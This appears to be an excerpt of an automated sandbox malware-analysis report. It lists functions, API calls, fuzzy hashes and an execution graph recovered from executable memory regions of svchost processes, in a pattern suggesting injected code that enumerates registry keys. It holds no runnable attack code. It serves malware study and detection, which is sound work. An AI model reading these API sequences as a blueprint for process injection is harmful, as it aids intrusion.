                                                • API String ID: 2882836952-0
                                                • Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                • Instruction ID: 99dfc4fcf1f808c1d587f51ed2563903beb1e99f7f72296784ee9e5aae22c6ef
                                                • Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                • Instruction Fuzzy Hash: 5461DD3A619B40C6EBA08B15E8643AA77A0F3D8755F105119EFCD53FA4DB7EC480CB82
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
                                                • API String ID: 2882836952-0
                                                • Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                • Instruction ID: 61f0b93766a00fae6dbea4e132b4cd45a7461bf2a2a0a27bac384a8aeabd8e9b
                                                • Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                • Instruction Fuzzy Hash: 3061CA3A519B84C6EBA09B15E86436A77A4F3D8785F100119EFCD43FA8DB7EC581CB80
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: 8a7605fd38867d60ada5b06d266a96cd1804c8da42d7adf0330415e10fdf2cc1
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction Fuzzy Hash: E311517EA78A1101FF981164EC763F51141ABF8376F0846ACAFF606ED68B76CCC54182
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: cbe74e5557a6928f4c23d3cd38acda0c45c4d79c392677fa95702988565d9402
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction Fuzzy Hash: AC113D3AA58A1101F7981164EC763F910516BF4376F14462DFFE606BDA8B76C8C74182
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2633076698.0000016C21130000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21130000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21130000_svchost.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: f6e5840d214e0c46fe94ff9651f314c378c8351b146e632a0cb17b36d6b872be
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction Fuzzy Hash: 6711903E648A4401F75411A7EC713F900806BF4B76E18022CAFE726EDA8BF6ECC14180
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                • String ID:
                                                • API String ID: 1092925422-0
                                                • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction ID: d96b6838e40694c20336e9cbe345d469acdb5eb1a72706f69234e055943d4d8f
                                                • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction Fuzzy Hash: 92112A3E724B4182EF149B21F8242EBA6B0F798B85F044129DFC907B94EE3EC585C744
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                • String ID:
                                                • API String ID: 1092925422-0
                                                • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction ID: c344c7cc02d7ea509f1fc1209fe6c775939eda1f1a2da58c0bd39e48754c0cd9
                                                • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction Fuzzy Hash: 62112A3A724B8082EB159B21F8242AAA7B4F798B85F04412DDFDD07B94EF3EC585C740
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2633076698.0000016C21130000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21130000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21130000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction ID: 253726c5d639c39e95ab2dcefa6d70e814a7a55e29fc28ddf3bd71fc52bbae63
                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction Fuzzy Hash: 7751A4BA2116808AEB14DF15EC54BA83395F3E0B99F518238DF8643B8CE776C8C19784
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2633076698.0000016C21130000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21130000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21130000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction ID: a42fea92dc332d1eae579d8efc7afea52b6d346f6bfe9fd9374ab4b4e8984951
                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction Fuzzy Hash: E1319079211690C6E714DF12EC547A937A4F7A0BDAF158228AF8747B8CDB3AC981C784
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Free
                                                • String ID:
                                                • API String ID: 3168794593-0
                                                • Opcode ID: 58c4a46a428cd9431a43c23367012082d3a0a44734d7d4b43a30409f6f14bb0b
                                                • Instruction ID: 48a5b5769b54eb6cf7f624361beb1fef3d473a9274f33a8d8fd7a625351376e8
                                                • Opcode Fuzzy Hash: 58c4a46a428cd9431a43c23367012082d3a0a44734d7d4b43a30409f6f14bb0b
                                                • Instruction Fuzzy Hash: 87112139564B84D6E7549F66B8542AA73B0F7D9B85F044019DFCA03F54DF3AC092C784
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction ID: ddcea61fa900e8203a9dcc6e602d83c1eb9b89408a54a90cf96bde6e779732e2
                                                • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction Fuzzy Hash: D671C53A21479182EB689E259D643FA6791F7E4BC5F44001ADFC963F88DE36C584C781
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction ID: e34381f2ed03d1b4c40e2bfa40563fd32f9153b7ffd81cc41305eaaeb94b8e9b
                                                • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction Fuzzy Hash: 3771BF3A2107D182E7289A259D643FAB694F7E5BC6F44001EDF8943F89EE37C684C780
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction ID: 0f0f0cf29caf80587c070d24c158894d07b31f9cdb686283d2a0c3121fcb2762
                                                • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction Fuzzy Hash: 1351E83A61479183EA389E2999743FAA651F3E5B81F10402DCFCA13F99DA37C481CBD1
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction ID: dbfb6d2829cb4421800de605741d321438edb1f47804a312cf30740133f4e650
                                                • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction Fuzzy Hash: 2D51A43A7187C142E6789A29A9783FA7651F3E5781F15402DDFCA03F99DA37C8858B80
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite
                                                • String ID: U
                                                • API String ID: 442123175-4171548499
                                                • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction ID: 12d2141ec145c3b86287e7edd7090d2f952637adf6e882a1912e5f63ec0e9bf4
                                                • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction Fuzzy Hash: CB41A77A725A4081EF209F25E8543EA67A0F7E8785F514129EFCD87B54DB3DC581CB80
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite
                                                • String ID: U
                                                • API String ID: 442123175-4171548499
                                                • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction ID: 5732acd9d87eb31710d82fb1ef79efc6dfd2e34cc95d5393707fb293c4f7eff9
                                                • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction Fuzzy Hash: 4541A776315B8081EB109F25E8643EAA7A0F7E8795F554029EFCD87B54DB3DC582CB80
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Stringtry_get_function
                                                • String ID: LCMapStringEx
                                                • API String ID: 2588686239-3893581201
                                                • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction ID: 367ffe91377a11250c5dbfc00c587626adb080f6ba7e16a74afeb3b4d8e94e48
                                                • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction Fuzzy Hash: A6113B3A208BC086DB60CB55B8502AAB7A0F7D8B94F54412AEFCD53F59DF39C4808B80
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: Stringtry_get_function
                                                • String ID: LCMapStringEx
                                                • API String ID: 2588686239-3893581201
                                                • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction ID: 83c2c5c8f2731e922c5ceba7e9523740c079107852d5bc1e0e384557f27f80cb
                                                • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction Fuzzy Hash: 10110B3A608BC086DB60CB56F8502AAB7A4F7D9B94F54412AEFCD43F59DF39C4918B40
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd
                                                Similarity
                                                • API ID: ExceptionFileHeaderRaise
                                                • String ID: csm
                                                • API String ID: 2573137834-1018135373
                                                • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction ID: ff4ef385d5e1f9dc09268b517e7edaf39318352c9655bab34ffb65fff72fcfbe
                                                • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction Fuzzy Hash: 22114236218B8482EB608F15E9503A9B7A0F7D4B95F184215DFCD07B58DF39C591C740
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: ExceptionFileHeaderRaise
                                                • String ID: csm
                                                • API String ID: 2573137834-1018135373
                                                • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction ID: 1831a1e8fe2135f263ddc4f8ba600c0e4896ca93aac9740321319821de2308e4
                                                • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction Fuzzy Hash: 26114C36218B8482EB648F15E9502AA77A0F7D8B99F184225DFCD07B68DF3AC591CB40
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd
                                                Similarity
                                                • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                • String ID: InitializeCriticalSectionEx
                                                • API String ID: 539475747-3084827643
                                                • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction ID: 1ad5ad443e48c7d9891e29dad2a88d2a95991e7ad2a9cccb0bb2ade2e2032015
                                                • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction Fuzzy Hash: 93F0B43D320B9091EE045B45F8111E96221A7D8B91F484019AFC913F54CF3AC4D4C7C1
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                • String ID: InitializeCriticalSectionEx
                                                • API String ID: 539475747-3084827643
                                                • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction ID: 2c3a8c8ddd5fcf93ee92c7f924a2b52a3f687d4675613e70ed85daf879bc5014
                                                • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction Fuzzy Hash: DDF0543971478091EA155B52F8505E96221A7D8B91F585019EFD903F54CF3BC9D6C780
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Valuetry_get_function
                                                • String ID: FlsSetValue
                                                • API String ID: 738293619-3750699315
                                                • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction ID: 7c284d29b508912afbd507fbef071bb43b8f6b03a5eb0b8ce13a62de1d78d0d1
                                                • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction Fuzzy Hash: A7E0657D22074091FE094B54FC216F96222ABE8782F584029DF8906F55CF3AC8D5C7C1
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: Valuetry_get_function
                                                • String ID: FlsSetValue
                                                • API String ID: 738293619-3750699315
                                                • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction ID: 8fca6d64bd7c8ce5edf493470c2f96acf7c3298e374ca77535f4cd5ae507b5aa
                                                • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction Fuzzy Hash: EAE0657961064091EE054B51FC256F92222ABE8782F58802EDFC906F55CF3BC8D6C780
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2633076698.0000016C21130000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21130000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21130000_svchost.jbxd
                                                Similarity
                                                • API ID: try_get_function
                                                • String ID: November$October
                                                • API String ID: 2742660187-1636048786
                                                • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction ID: 890b65e7936a5be55288ecca53bfe997dcb8dd25c27aab950b388e681bf1e270
                                                • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction Fuzzy Hash: 1BE0657930098591EA089B52BC713F4621197F4F42F59502A9F9A06E59CE3AC8C69280
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID:
                                                • API String ID: 756756679-0
                                                • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction ID: fe7f70c9b01a776c4600d65242492d453f1c520b8b965682475c96f809560b67
                                                • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction Fuzzy Hash: E021A33A654B90C1EB128F69A8142EAB3A0FBE4B95F554118DFCC97F14EE39C5828740
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID:
                                                • API String ID: 756756679-0
                                                • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction ID: 4fd021d44bc251e6c019001d70fed18a74ef30a47250af91e4af9a8afb704653
                                                • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction Fuzzy Hash: 9821713A605BD085EB128F59A8142EAB3A0FBD4B95F154118DFCC47F14EF7AC5828740
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$AllocProcess
                                                • String ID:
                                                • API String ID: 1617791916-0
                                                • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction ID: 488063919b9adf6f39e3b7fef52b3da0e2a16ff86ab7b11c546b6edb740dcd12
                                                • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction Fuzzy Hash: 4FE039B9631601C6EB048B72D8243AA36E1EB98B02F488028CE8907750DF7EC4D9C780

                                                Execution Graph

                                                Execution Coverage:0.7%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:0%
                                                Total number of Nodes:68
                                                Total number of Limit Nodes:2
                                                execution_graph 13964 26f47bd2908 13966 26f47bd2936 13964->13966 13965 26f47bd2a2b LoadLibraryA 13965->13966 13966->13965 13967 26f47bd2aa7 13966->13967 13968 26f48141c28 13973 26f48141650 GetProcessHeap HeapAlloc 13968->13973 13970 26f48141c3e Sleep SleepEx 13971 26f48141c37 13970->13971 13971->13970 13972 26f481415c0 StrCmpIW StrCmpW 13971->13972 13972->13971 14017 26f48141274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 13973->14017 13975 26f48141678 14018 26f48141274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 13975->14018 13977 26f48141689 14019 26f48141274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 13977->14019 13979 26f48141692 14020 26f48141274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 13979->14020 13981 26f4814169b 13982 26f481416b6 RegOpenKeyExW 13981->13982 13983 26f481418ce 13982->13983 13984 26f481416e8 RegOpenKeyExW 13982->13984 13983->13971 13985 26f48141711 13984->13985 13986 26f48141727 RegOpenKeyExW 13984->13986 14021 26f481412c8 RegQueryInfoKeyW 13985->14021 13987 26f48141762 RegOpenKeyExW 13986->13987 13988 26f4814174b 13986->13988 13991 26f48141786 13987->13991 13992 26f4814179d RegOpenKeyExW 13987->13992 14031 26f4814104c RegQueryInfoKeyW 13988->14031 13995 26f481412c8 16 API calls 13991->13995 13996 26f481417c1 13992->13996 13997 26f481417d8 RegOpenKeyExW 13992->13997 13998 26f48141793 RegCloseKey 13995->13998 13999 26f481412c8 16 API calls 13996->13999 14000 26f48141813 RegOpenKeyExW 13997->14000 14001 26f481417fc 13997->14001 13998->13992 14004 26f481417ce RegCloseKey 13999->14004 14002 26f4814184e RegOpenKeyExW 14000->14002 14003 26f48141837 14000->14003 14005 26f481412c8 16 API calls 14001->14005 14007 26f48141872 14002->14007 14008 26f48141889 RegOpenKeyExW 14002->14008 14006 26f4814104c 6 API calls 14003->14006 14004->13997 14009 26f48141809 RegCloseKey 14005->14009 14010 26f48141844 RegCloseKey 14006->14010 14011 26f4814104c 6 API calls 14007->14011 14012 26f481418c4 RegCloseKey 14008->14012 14013 26f481418ad 14008->14013 14009->14000 14010->14002 14014 26f4814187f RegCloseKey 14011->14014 14012->13983 14015 26f4814104c 6 API calls 14013->14015 14014->14008 14016 26f481418ba RegCloseKey 14015->14016 14016->14012 14017->13975 14018->13977 14019->13979 14020->13981 14022 26f48141334 GetProcessHeap HeapAlloc 14021->14022 14023 26f48141499 RegCloseKey 14021->14023 14024 26f48141485 GetProcessHeap HeapFree 14022->14024 14025 26f4814135d RegEnumValueW 14022->14025 14023->13986 14024->14023 14029 26f481413af 14025->14029 14027 26f4814142f lstrlenW GetProcessHeap HeapAlloc StrCpyW 14027->14029 14028 26f481413dd GetProcessHeap HeapAlloc 14028->14029 14029->14024 14029->14025 14029->14027 14029->14028 14030 26f48141413 GetProcessHeap HeapFree 14029->14030 14037 26f48141554 14029->14037 14030->14027 14032 26f481411b5 RegCloseKey 14031->14032 14035 26f481410b9 14031->14035 14032->13987 14033 26f481410c7 RegEnumValueW 14033->14035 14034 26f48141149 GetProcessHeap HeapAlloc 14034->14035 14035->14032 14035->14033 14035->14034 14036 26f4814117f GetProcessHeap HeapFree 14035->14036 14036->14035 14038 26f4814156e 14037->14038 14041 26f481415a4 14037->14041 14039 26f48141585 StrCmpIW 14038->14039 14040 26f4814158d StrCmpW 14038->14040 14038->14041 14039->14038 14040->14038 14041->14029

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                • String ID:
                                                • API String ID: 1683269324-0
                                                • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                • Instruction ID: abb54b9b434214e89d45aa004bc454e62556a9fa111dc1bc77e152ff3e5a9541
                                                • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                • Instruction Fuzzy Hash: E5115E70A146C151FFE19B69BB5EB9B2290B7D4B14F4800379B3687DA4EF3BC0C48210

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 0000026F48141650: GetProcessHeap.KERNEL32 ref: 0000026F4814165B
                                                  • Part of subcall function 0000026F48141650: HeapAlloc.KERNEL32 ref: 0000026F4814166A
                                                  • Part of subcall function 0000026F48141650: RegOpenKeyExW.ADVAPI32 ref: 0000026F481416DA
                                                  • Part of subcall function 0000026F48141650: RegOpenKeyExW.ADVAPI32 ref: 0000026F48141707
                                                  • Part of subcall function 0000026F48141650: RegCloseKey.ADVAPI32 ref: 0000026F48141721
                                                  • Part of subcall function 0000026F48141650: RegOpenKeyExW.ADVAPI32 ref: 0000026F48141741
